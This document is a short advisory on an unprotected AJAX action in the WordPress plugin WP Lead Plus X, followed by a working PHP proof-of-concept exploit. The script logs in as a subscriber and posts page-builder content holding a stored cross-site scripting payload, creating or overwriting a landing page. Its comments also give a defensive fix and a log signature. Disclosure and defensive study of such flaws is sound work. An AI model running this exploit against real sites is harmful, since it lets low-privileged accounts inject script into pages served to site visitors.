WP Lead Plus X is a WordPress plugin that allows site owners to create custom landing and “squeeze” pages, complete with its own page builder interface capable of inserting custom JavaScript. Unfortunately, this page builder saved and updated pages through an unprotected AJAX action, core37_lp_save_page, which performed neither a capability check nor a nonce check.
<?php
// Proof of concept for the unprotected `core37_lp_save_page` admin-ajax action described above:
// it logs in with a low-privileged account and then posts builder content containing a <script>
// element, demonstrating that the handler saved a page without a capability check or a nonce.
// Defensive reference: the handler should call check_ajax_referer() for the builder's nonce and
// current_user_can() with a page-editing capability before touching any page data; in web logs,
// POSTs to wp-admin/admin-ajax.php with action=core37_lp_save_page from non-editor sessions are
// the signal to look for.
//
// Settings (all taken from the command line, no validation is done on them)
$url = $argv[1]; //URL of the site
$wp_user = $argv[2]; //Subscriber Username
$wp_pass = $argv[3]; //Subscriber Password
$urlbits = parse_url($url);
// Only scheme and host are kept: a port or a subdirectory install path in $url is dropped here.
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';
// Log in as subscriber. The session cookie is persisted in a temp file (never removed by this
// script) so the second request can reuse it via CURLOPT_COOKIEFILE.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-login.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
// Standard wp-login.php form fields; 'testcookie' mirrors what the browser form sends.
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'log' => $wp_user,
'pwd' => $wp_pass,
'wp-submit' => 'Log+In',
'testcookie' => '1'
)));
// The login response is captured but never inspected: a failed login is not detected, and the
// next request would then simply go out unauthenticated.
$output = curl_exec($ch);
curl_close($ch);
// Insert a page with stored XSS.
// 'pageContent' is URL-encoded builder markup whose "code" element holds a <script> block;
// 'pageSettings' is the builder's model JSON for the same elements (the code element repeats the
// script, URL-encoded). Note that no nonce field (e.g. `_wpnonce` / `security`) is included in
// $params at all — per the description above the action accepted the request on the session
// cookie alone.
$params=array(
'pageContent' => "%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-lp-172110%22%20style%3D%22width%3A%20700px%3B%22%20class%3D%22c37-lp%20c37-step%20ui-sortable%20ui-droppable%22%3E%0A%20%20%20%20%3Csection%20class%3D%22c37-section%20ui-sortable%20ui-droppable%22%20id%3D%22c37-section-643520%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-row%20d-flex%20flex-row%22%20id%3D%22c37-row-326243%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-col-md-12%20c37-col-sm-12%20c37-col-12%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-box-865567%22%20class%3D%22c37-box%20flex-column%20d-flex%20flex-column%20ui-sortable%20ui-droppable%22%3E%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%3Cdiv%20data-original%3D%22false%22%20data-c37-type%3D%22code%22%20class%3D%22c37-lp-element%20c37-item-element%20ui-draggable-handle%22%20id%3D%22c37-code-108583%22%3E%0A%20%20%20%20%3Cdiv%20data-content%3D%22%22%20class%3D%22c37-code-container%22%3E%3Cscript%3Ealert('xss!')%3B%3C%2Fscript%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%0A%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%20%20%20%20%3C%2Fsection%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20",
// Optional fourth argument selects an existing page ID to overwrite; '0' (the default) creates a new one.
'pageID' => isset($argv[4]) ? $argv[4] : '0',
'pageSlug'=>'poctest',
'pageTitle' => 'PoCTest',
// NOTE(review): the title/slug inside this JSON ("PoC"/"poc") differ from 'pageTitle'/'pageSlug' above;
// which one the handler honours is not visible here.
'pageSettings' => '{"isVariant":false,"isPage":true,"variantPageID":0,"webFonts":[],"modelsJSON":{"c37-section-643520":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","layout":12,"containerClass":"","etype":"section","editingElementID":"c37-section-643520"},"c37-row-326243":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","layout":"12","etype":"row","editingElementID":"c37-row-326243"},"c37-box-865567":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","size":{"desktop":12,"tablet":12,"phone":12},"direction":"flex-column","etype":"box","editingElementID":"c37-box-865567"},"c37-code-108583":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","code":"%3Cscript%3Ealert(\'xss!\')%3B%3C%2Fscript%3E","etype":"code","editingElementID":"c37-code-108583"},"page":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"deskto
p":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","width":"700","codes":{"trackingCode":"","experimentCode":"","beforeBodyClosing":"","afterBodyOpening":"","metaCode":"","customCSSCode":""},"pageTitle":"PoC","pageSlug":"poc","weight":"1","cssID":"c37-lp-172110","editingElementID":"page","etype":"page"}},"flipCountdown":{},"simpleCountdown":{},"previewURL":"","imageSliders":{},"weight":1,"elementsActions":{},"jsCodes":{},"compiledCSS":""}',
// The vulnerable admin-ajax action name.
'action' => 'core37_lp_save_page'
);
// Second request: POST the builder payload to admin-ajax.php, reusing the cookie jar from the login.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-ajax.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8', 'Connection: close'));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
$output = curl_exec($ch);
// Raw admin-ajax response is printed as-is (the HTTP status code is not checked).
echo $output;
curl_close($ch);